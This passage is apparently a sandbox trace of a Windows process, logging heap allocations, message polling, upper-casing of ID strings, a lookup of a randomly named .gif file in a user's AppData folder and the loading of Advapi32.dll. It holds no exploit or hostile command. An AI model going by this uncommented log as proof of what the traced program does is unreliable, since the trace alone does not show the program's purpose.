Size=0x10) returned 0x2aa9598 [0112.953] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0112.953] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722d8 [0112.953] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0112.953] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0112.953] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722a8 [0112.953] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ee0 [0112.953] CharUpperBuffW (in: lpsz="SSA2100602512", cchLength=0xd | out: lpsz="SSA2100602512") returned 0xd [0112.953] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ee0 | out: hHeap=0x2af0000) returned 1 [0112.953] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0112.953] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0112.953] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0112.953] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0112.953] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0112.953] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0112.953] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ebc0 [0112.954] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0112.954] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ebc0 | out: hHeap=0x2af0000) returned 1 [0112.954] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0112.954] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0112.954] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72338 [0112.954] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0112.954] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0112.954] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0112.954] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0112.954] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72378 [0112.954] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0112.954] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0112.954] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72238 [0112.954] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0112.954] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ee0 [0112.954] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0112.954] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0112.954] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0112.954] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0112.954] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0112.954] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722a8 [0112.954] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0112.954] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0112.955] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72398 [0112.955] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0112.955] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0112.955] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0112.955] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0112.955] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c10 | out: hHeap=0x2af0000) returned 1 [0112.955] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0112.955] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0112.955] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0112.955] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0112.955] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722f8 [0112.955] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0112.955] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0112.955] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0112.955] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0112.955] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72268 [0112.955] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b70 [0112.955] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0112.955] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722c8 [0112.955] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0112.955] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0112.955] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0112.955] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0112.955] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0112.955] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0112.956] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0112.956] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0112.956] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722d8 [0112.956] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa180 [0112.956] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0112.956] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa180 | out: hHeap=0x2af0000) returned 1 [0112.956] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0112.956] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0112.956] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0112.956] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0112.956] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0112.956] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0112.956] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0112.956] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0112.956] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721d8 [0112.956] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d78 [0112.956] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0112.956] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721e8 [0112.956] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0112.956] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0112.956] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0112.956] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0112.957] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722d8 [0112.957] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0112.957] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0112.957] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0112.957] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0112.957] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0112.957] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e40 | out: hHeap=0x2af0000) returned 1 [0112.957] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0112.957] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0112.957] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0112.957] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72358 [0112.957] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0112.957] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0112.957] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0112.957] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa150 [0112.957] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72268 [0112.957] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0112.957] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f40 [0112.957] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72348 [0112.957] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f40 | out: hHeap=0x2af0000) returned 1 [0112.957] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77da0 [0112.957] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fa0 [0112.957] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa198 [0112.957] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d28 | out: hHeap=0x2af0000) returned 1 [0112.957] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72358 | out: hHeap=0x2af0000) returned 1 [0112.957] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0112.957] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0112.958] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0112.958] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722f8 [0112.958] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0112.958] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0112.958] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0112.958] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fb8 [0112.958] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721a8 [0112.958] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0112.958] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1b0 [0112.958] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72358 [0112.958] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1b0 | out: hHeap=0x2af0000) returned 1 [0112.958] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f08 [0112.958] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1f8 [0112.958] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1b0 [0112.958] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0112.958] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0112.958] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0112.958] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa048 [0112.958] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721f8 [0112.958] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa228 [0112.958] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0112.958] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/1px3r9YZM.gif", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc0e61f40, ftCreationTime.dwHighDateTime=0x1d5c949, ftLastAccessTime.dwLowDateTime=0x84eb2f50, ftLastAccessTime.dwHighDateTime=0x1d5c906, ftLastWriteTime.dwLowDateTime=0x84eb2f50, ftLastWriteTime.dwHighDateTime=0x1d5c906, nFileSizeHigh=0x0, nFileSizeLow=0x13dfb, dwReserved0=0x0, dwReserved1=0x0, cFileName="1px3r9YZM.gif", cAlternateFileName="1PX3R9~1.GIF")) returned 0x9a4a00 [0112.959] FindClose (in: hFindFile=0x9a4a00 | out: hFindFile=0x9a4a00) returned 1 [0112.959] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa228 | out: hHeap=0x2af0000) returned 1 [0112.959] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa048 | out: hHeap=0x2af0000) returned 1 [0112.959] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0112.959] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0112.959] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fb8 | out: hHeap=0x2af0000) returned 1 [0112.959] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0112.959] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1b0 | out: hHeap=0x2af0000) returned 1 [0112.959] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e90 | out: hHeap=0x2af0000) returned 1 [0112.959] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0112.959] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0112.959] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1b0 [0112.959] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722f8 [0112.959] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1b0 | out: hHeap=0x2af0000) returned 1 [0112.959] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0112.960] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa078 [0112.960] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa138 [0112.960] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72338 [0112.960] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0112.960] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa090 [0112.960] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721d8 [0112.960] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa090 | out: hHeap=0x2af0000) returned 1 [0112.960] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0112.960] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f88 [0112.960] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa090 [0112.960] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0112.960] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa078 | out: hHeap=0x2af0000) returned 1 [0112.960] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0a8 [0112.960] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa078 [0112.960] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721f8 [0112.960] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0112.960] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fb8 | out: hHeap=0x2af0000) returned 1 [0112.960] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa078 | out: hHeap=0x2af0000) returned 1 [0112.961] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0a8 | out: hHeap=0x2af0000) returned 1 [0112.961] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0112.961] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa138 | out: hHeap=0x2af0000) returned 1 [0112.961] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0112.961] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa090 | out: hHeap=0x2af0000) returned 1 [0112.961] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d28 | out: hHeap=0x2af0000) returned 1 [0112.961] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0112.961] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0112.961] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0112.961] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d28 | out: hHeap=0x2af0000) returned 1 [0112.961] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0112.961] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0112.961] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0112.961] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0112.961] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d28 | out: hHeap=0x2af0000) returned 1 [0112.961] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0112.961] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa048 | out: hHeap=0x2af0000) returned 1 [0112.961] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0c0 | out: hHeap=0x2af0000) returned 1 [0112.961] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0f0 | out: hHeap=0x2af0000) returned 1 [0112.961] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0112.962] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0112.962] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0112.962] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ebc0 | out: hHeap=0x2af0000) returned 1 [0112.962] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0112.962] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0112.962] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b20 | out: hHeap=0x2af0000) returned 1 [0112.962] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0112.962] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0112.962] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0112.962] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0112.962] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d28 | out: hHeap=0x2af0000) returned 1 [0112.962] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0112.962] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1b0 | out: hHeap=0x2af0000) returned 1 [0112.962] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa210 | out: hHeap=0x2af0000) returned 1 [0112.962] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1c8 | out: hHeap=0x2af0000) returned 1 [0112.962] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0112.962] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0112.962] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec40 | out: hHeap=0x2af0000) returned 1 [0112.962] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0112.962] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa228 | out: hHeap=0x2af0000) returned 1 [0112.962] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa210 | out: hHeap=0x2af0000) returned 1 [0112.962] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa030 | out: hHeap=0x2af0000) returned 1 [0112.962] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0112.962] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0112.963] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0112.963] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1e0 | out: hHeap=0x2af0000) returned 1 [0112.963] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0112.963] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa210 | out: hHeap=0x2af0000) returned 1 [0112.963] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f58 | out: hHeap=0x2af0000) returned 1 [0112.963] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fb8 | out: hHeap=0x2af0000) returned 1 [0112.963] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6e80 | out: hHeap=0x2af0000) returned 1 [0112.963] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0112.963] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0112.963] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa000 | out: hHeap=0x2af0000) returned 1 [0112.963] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa210 | out: hHeap=0x2af0000) returned 1 [0112.963] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa120 | out: hHeap=0x2af0000) returned 1 [0112.963] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0112.963] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x76390000 [0112.963] HeapFree (in: hHeap=0x2af0000, 